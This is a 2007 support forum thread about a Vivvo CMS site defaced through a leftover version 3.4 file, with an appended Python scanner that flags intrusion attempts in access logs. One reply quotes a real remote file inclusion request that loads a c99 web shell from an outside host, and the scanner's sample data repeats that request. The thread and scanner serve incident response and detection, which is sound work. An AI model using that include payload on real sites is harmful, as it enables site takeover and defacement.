3.5 Hacked


Steve O
05-07-2007, 09:48 AM
Hi,

Recently installed 3.5. Had not even finished the design, and have now been hacked by 'HACKED BY ADANALI'.

Trouble is I don't know what files they have interfered with!

Anybody any ideas?

If Vivvo don't get a grip on this they could be losing customers.

boccio
05-07-2007, 10:06 AM
This is a bit strange. You upgraded to 3.5, but I'm not sure if you left anything from previous versions, or perhaps some 3.2 or 3.4 files? If you had some backdoor on your server from before, it could have been used, regardless of Vivvo 3.5.

Just in case - please send us your HTTP logs for the last 7 days, we'd be happy to analyze them and tell you what exactly was the point of attack. Make sure to use a clean 3.5 install and delete all the files prior to that; that way you won't have any "holes" left.

Steve O
05-07-2007, 10:44 AM
Hi Boccio,

This was a clean install, I had deleted the old 3.4 files.

Sorry, showing my ignorance here, where do I find HTTP logs?

I'm also downloading all the files on the server, so that I can run a file comparison with the originals.

boccio
05-07-2007, 11:06 AM
You can find them in your cPanel. If you're unsure about this, please contact us on support HelpDesk ASAP and we'll continue from there.

mrmotivation
05-07-2007, 02:13 PM
After reviewing my Google Analytics the other day, I found 5 times that people came to our website using the keywords "Powered by Vivvo.net CMS".

While it is my hope that other Vivvo users are just trying to see other variations of Vivvo in use, my reality tells me that it is hackers trying to find other sites that use Vivvo software to hack.


Aaron

Steve O
05-07-2007, 03:32 PM
Yup,

I've just searched Google with 'powered by Vivvo' and, out of the 10-15 sites I looked at, I would say 4 of them have been hacked.

boccio
05-07-2007, 04:05 PM
“Powered by” is the standard practice of software vendors, and it is not directly bound to being accessible by hackers. Every software (CMS) has its unique tags, META-s, or code snippets, and can be searched for by those phrases the same way it can be by the “powered” statement.

On the other hand, the quantity of hacked sites is substantially inflated. You have to take into consideration that 90% of those sites are non-licensed (pirated) copies that use the old 3.4, or even 3.25, version, and a typical cracker usually chases everything he can get his hands on. As for our licensed users who regularly apply patches and upgrades, the likelihood of getting hacked is indeed very small and comparable to that of any similar system on the market. We constantly work on improving the security of our CMS and cooperate with the members of the Vivvo community to identify any potential problems or issues that may arise.

Steve O
05-07-2007, 04:18 PM
Hi Boccio,

On that note, any news on my hacked problem?

As I had not finished designing the site, will it be OK to re-run the installer?

boccio
05-08-2007, 05:49 PM
After examining your logs, we found out that the attacker took advantage of an old exploit of the db_conn.php file (in 3.4), which was most probably left behind during the upgrade.

Steve O
05-08-2007, 06:42 PM
Thank you.

Very professional response.

Trable
05-11-2007, 09:33 AM
Hi,

I have found how they work.

They test how the connection is between the site and the database, then they have a way to break the browser and they load the shell text from an external server, then they can load the shell and hack the site.

Like this:
/inc/cmses/aedatingCMS.php?dir[inc]=http://tamturk.org/c99.txt? (the link is dead now).

http://www.zone-h.org/component/option,com_attacks/Itemid,43/filter_defacer,TamTurk

The best way for Vivvo to be alert is to build IP blocking into the script; then you can block the IPs that try to hack your site.
Make a log file for the site too, that is also important.

suc6
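Added example, not code from this thread or from Vivvo: a small Python scanner over constructed cPanel-style access-log lines that flags the two things the thread points at, a query parameter carrying a remote URL (the include pattern Trable shows) and any request to the leftover 3.4 db_conn.php that boccio identified, then counts hits per source IP for the block list Trable suggests. The log format, the file name to watch and the sample lines are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Assumes Apache/cPanel "combined" access-log lines; the thread says the logs
# come from cPanel but not which format they are in.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# The leftover 3.4 file boccio identified as the entry point. Any request to it
# on a clean 3.5 install deserves a look (assumption: 3.5 does not serve it).
LEGACY_FILES = {"db_conn.php"}

def rfi_values(query):
    """Return (param, value) pairs whose value is a remote URL, the pattern
    Trable describes (a query parameter pointing at an external shell file)."""
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if re.match(r'^(https?|ftp)://', v, re.IGNORECASE)]

def scan_log(lines):
    """Return (ip, reason, url) for every request that looks like a probe."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        parts = urlsplit(m.group("url"))
        reasons = [f"remote URL in parameter {k}" for k, _ in rfi_values(parts.query)]
        if parts.path.rsplit("/", 1)[-1] in LEGACY_FILES:
            reasons.append("request to legacy 3.4 file")
        findings.extend((m.group("ip"), r, m.group("url")) for r in reasons)
    return findings

def probing_ips(findings):
    """Count hits per source IP, the list an admin would feed an IP block."""
    return Counter(ip for ip, _, _ in findings)

# Constructed sample lines (not real log data from the thread); the remote
# host is the reserved example.invalid name.
SAMPLE = [
    '203.0.113.5 - - [11/May/2007:09:33:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 5123',
    '203.0.113.9 - - [11/May/2007:09:34:10 +0000] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://example.invalid/c99.txt? HTTP/1.1" 200 812',
    '198.51.100.7 - - [11/May/2007:09:35:02 +0000] "GET /db_conn.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for ip, reason, url in scan_log(SAMPLE):
        print(f"{ip}: {reason}: {url}")
    print(dict(probing_ips(scan_log(SAMPLE))))
```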